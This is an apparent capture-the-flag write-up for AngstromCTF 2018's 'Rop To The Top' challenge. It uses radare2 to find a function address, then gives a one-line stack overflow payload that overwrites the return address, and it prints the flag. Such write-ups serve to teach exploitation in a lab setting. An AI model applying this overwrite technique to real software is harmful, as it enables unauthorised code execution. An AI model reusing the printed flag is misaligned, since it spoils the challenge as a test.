AngstromCTF_2018: Rop To The Top

Category: Binary Points: 130 Description:

Rop, rop, rop Rop to the top! Slip and slide and ride that rhythm... Here's some binary and source. Navigate to /problems/roptothetop/ on the shell server to try your exploit out!

Write-up

Relatively simple challenge too, with a simple ROP exploit code.

# r2 rop_to_the_top32
r_config_set: variable 'asm.cmtright' not found
 -- To debug a program, you can call r2 with 'dbg://<path-to-program>' or '-d <path..>'
[0x080483e0]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[x] Emulate code to find computed references (aae)
[x] Analyze consecutive function (aat)
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[x] Type matching analysis for all functions (afta)

[0x080483e0]> is
[Symbols]
[...]
060 0x00001028 0x0804a028 GLOBAL OBJECT    0 __dso_handle
061 0x0000061c 0x0804861c GLOBAL OBJECT    4 _IO_stdin_used
063 0x000005a0 0x080485a0 GLOBAL   FUNC   93 __libc_csu_init
064 0x0804a030 0x0804a030 GLOBAL NOTYPE    0 _end
065 0x000003e0 0x080483e0 GLOBAL   FUNC    0 _start
066 0x000004db 0x080484db GLOBAL   FUNC   25 the_top
067 0x00000618 0x08048618 GLOBAL OBJECT    4 _fp_hw
[...]

With the address of the_top(), we can now craft our exploit.

$ ./rop_to_the_top32 `python -c "print('A' * 44 + '\xdb\x84\x04\x08')"`
Now copying input...
Done!
actf{strut_your_stuff}

Therefore, the flag is actf{strut_your_stuff}.